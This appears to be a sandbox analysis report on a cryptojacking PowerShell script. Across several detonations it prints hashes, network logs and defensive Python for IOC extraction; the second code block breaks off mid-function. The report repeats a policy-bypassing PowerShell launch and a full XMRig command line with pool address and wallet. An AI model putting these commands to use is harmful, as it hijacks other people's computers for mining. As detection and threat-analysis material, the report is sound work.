memory/1668-114-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-115-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-116-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-117-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-118-0x00007FF76D640000-0x00007FF76E273000-memory.dmp
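
The __PSScriptPolicyTest_*.ps1 entries in the Files lists of behavioral22, behavioral32 and behavioral27 are PowerShell's own startup artifact, not a file the sample dropped: on launch PowerShell writes a small test script to %TEMP% to find out whether AppLocker/WDAC would block script execution (and so whether it must run in ConstrainedLanguage mode). The digests listed for behavioral22 are exactly those of the single byte "1", which the code below recomputes; the variant with MD5 d17fe0a3... in behavioral32/behavioral27 has different content that is not reproduced on the page, so it is reported as unverified rather than guessed. The script also pivots on SHA256 across detonations, which shows the same xmrig.exe (2025f4fe...) was fetched in every run. This is an added example, not sandbox output; the record tuples are copied from the report, the category names are my own, and the "1" content is the one assumption beyond the listed hashes.

```python
import hashlib
import re
from collections import defaultdict

# PowerShell's startup probe file name: __PSScriptPolicyTest_<random>.<random>.ps1
POLICY_PROBE = re.compile(r"^__PSScriptPolicyTest_[0-9a-z]+\.[0-9a-z]+\.ps1$", re.I)

# (detonation, path, md5, sha1, sha256) copied from the Files sections of behavioral22/32/27.
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
FILE_RECORDS = [
    ("behavioral22", TEMP + r"\__PSScriptPolicyTest_zwxumpzt.4q1.ps1",
     "c4ca4238a0b923820dcc509a6f75849b", "356a192b7913b04c54574d18c28d46e6395428ab",
     "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b"),
    ("behavioral22", TEMP + r"\xmrig-6.21.3\xmrig.exe",
     "205ad9eb6acd6f58752899669b69fe74", "bedb78ac5034259b86c2cbc915de2e861e8d7604",
     "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"),
    ("behavioral32", TEMP + r"\__PSScriptPolicyTest_rb1tnmk3.eb1.ps1",
     "d17fe0a3f47be24a6453e9ef58c94641", "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
     "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"),
    ("behavioral32", TEMP + r"\xmrig-6.21.3\xmrig.exe",
     "205ad9eb6acd6f58752899669b69fe74", "bedb78ac5034259b86c2cbc915de2e861e8d7604",
     "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"),
    ("behavioral27", TEMP + r"\__PSScriptPolicyTest_kai0klk0.twi.ps1",
     "d17fe0a3f47be24a6453e9ef58c94641", "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
     "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"),
    ("behavioral27", TEMP + r"\xmrig-6.21.3\xmrig.exe",
     "205ad9eb6acd6f58752899669b69fe74", "bedb78ac5034259b86c2cbc915de2e861e8d7604",
     "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"),
]

# Probe contents whose digests can be recomputed offline (assumption: the single byte "1"
# is what reproduces the behavioral22 digests). The content behind the behavioral27/32
# variant is not on the page, so those records come back "content not verified".
KNOWN_PROBE_CONTENTS = [b"1"]


def digests(data):
    """MD5/SHA1/SHA256 hex digests in the same order as the report columns."""
    return (hashlib.md5(data).hexdigest(), hashlib.sha1(data).hexdigest(),
            hashlib.sha256(data).hexdigest())


def classify(record):
    """Label one file record; returns (category, detail)."""
    _, path, md5, sha1, sha256 = record
    name = path.rsplit("\\", 1)[-1]
    if POLICY_PROBE.match(name):
        verified = any(digests(c) == (md5, sha1, sha256) for c in KNOWN_PROBE_CONTENTS)
        return "powershell_policy_probe", "content verified" if verified else "content not verified"
    if name.lower().endswith(".exe") and "\\temp\\" in path.lower():
        return "dropped_pe_in_temp", name
    return "other", name


def pivot_by_sha256(records):
    """Hashes seen in more than one detonation: a payload fetched identically every run is a stable IOC."""
    seen = defaultdict(set)
    for detonation, _, _, _, sha256 in records:
        seen[sha256].add(detonation)
    return {h: sorted(d) for h, d in seen.items() if len(d) > 1}


if __name__ == "__main__":
    for rec in FILE_RECORDS:
        print(rec[0], classify(rec))
    print(pivot_by_sha256(FILE_RECORDS))
```

The probe file is worth excluding from IOC lists and from "dropped file" detections; the recurring xmrig.exe hash is the one file artifact here that is worth blocking.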

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:39

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows, all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/2732-0-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3imtyk4.5g2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:39

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1746s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4exrp5zk.san.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:59

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1753s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ciktlqf.kzk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:01

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1008-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ecxg3xlp.fba.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3632-79-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-80-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-81-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-82-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-83-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-84-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-85-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-86-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-87-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-88-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-89-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-90-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-91-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-92-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-93-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-94-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-95-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-96-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-97-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-98-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-99-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-100-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-101-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-102-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-103-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-104-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-105-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-106-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-107-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-108-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-109-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-110-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-111-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-112-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-113-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-114-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-115-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-116-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-117-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:08

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, every one with Description, Indicator, Process and Target reported as N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
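The xmrig.exe command line under Processes above carries every account and pool indicator the report has for the miner: `-a rx` selects RandomX (the SeLockMemoryPrivilege adjustment listed under Signatures is XMRig enabling large pages for the RandomX dataset), `-o` names the pool over stratum+ssl on port 443, and `-u` holds the unMineable `COIN:address.worker` string. The Python below is an added example, not part of the sandbox output: it parses the two command lines copied from this section into an IOC record and lists the reasons the PowerShell-to-xmrig.exe chain stands out. The POOL_DOMAINS watchlist, the option handling and the scoring rules are my own assumptions. The `__PSScriptPolicyTest_*.ps1` file under Files is written by PowerShell itself when it probes script-execution policy, which is why its hash is identical in every run, so it is deliberately not treated as an indicator here.

```python
"""Extract IOCs from the XMRig command line in this report and score the
PowerShell -> xmrig.exe launch chain.

Added example for this report; it is not part of the sandbox output. The two
command-line strings are copied from the behavioral28 Processes section; the
parser, the field names and the scoring rules are my own assumptions.
"""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

POWERSHELL_CMD = (
    'powershell.exe -ExecutionPolicy bypass -File '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (8).ps1"'
)
XMRIG_CMD = (
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
    '-o stratum+ssl://rx.unmineable.com:443 '
    '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
    '.unmineable_worker_vilqtiac -p x'
)

# XMRig short/long option names that carry the pool and wallet configuration.
_FLAGS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
          "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}
_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
# Assumed watchlist: only the pool seen in this report is listed.
POOL_DOMAINS = ("unmineable.com",)


def win_split(cmdline: str) -> list:
    """Split a Windows command line on whitespace, honouring double quotes.
    Backslashes are kept literally (shlex in POSIX mode would eat them)."""
    return [quoted if quoted else bare for quoted, bare in _TOKEN_RE.findall(cmdline)]


@dataclass
class MinerIOCs:
    image: str
    algo: Optional[str]
    pool_host: Optional[str]
    pool_port: Optional[int]
    tls: bool
    coin: Optional[str]
    wallet: Optional[str]
    worker: Optional[str]
    password: Optional[str]


def parse_xmrig_cmdline(cmdline: str) -> MinerIOCs:
    argv = win_split(cmdline)
    opts = {}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--") and "=" in tok:       # --url=host:port form
            flag, val = tok.split("=", 1)
            i += 1
        elif tok in _FLAGS and i + 1 < len(argv):     # -o host:port form
            flag, val = tok, argv[i + 1]
            i += 2
        else:
            i += 1
            continue
        if flag in _FLAGS:
            opts[_FLAGS[flag]] = val
    url = opts.get("url", "")
    # xmrig also accepts a bare host:port; give urlsplit a netloc either way
    parts = urlsplit(url if "://" in url else "//" + url) if url else None
    scheme = (parts.scheme if parts else "") or ""
    # unMineable convention: <COIN>:<address>.<worker>; other pools omit COIN:
    account, _, worker = opts.get("user", "").partition(".")
    coin, sep, address = account.partition(":")
    if not sep:
        coin, address = None, account
    return MinerIOCs(
        image=argv[0] if argv else "",
        algo=opts.get("algo"),
        pool_host=parts.hostname if parts else None,
        pool_port=parts.port if parts else None,
        tls=scheme.endswith(("+ssl", "+tls")),
        coin=coin,
        wallet=address or None,
        worker=worker or None,
        password=opts.get("pass"),
    )


def score_launch_chain(parent_cmdline: str, miner: MinerIOCs) -> list:
    """Return the observations that make this parent/child pair look like the
    report's chain; an empty list means nothing matched."""
    reasons = []
    low = [t.lower() for t in win_split(parent_cmdline)]
    if low and low[0].rsplit("\\", 1)[-1] == "powershell.exe":
        for i, tok in enumerate(low[:-1]):
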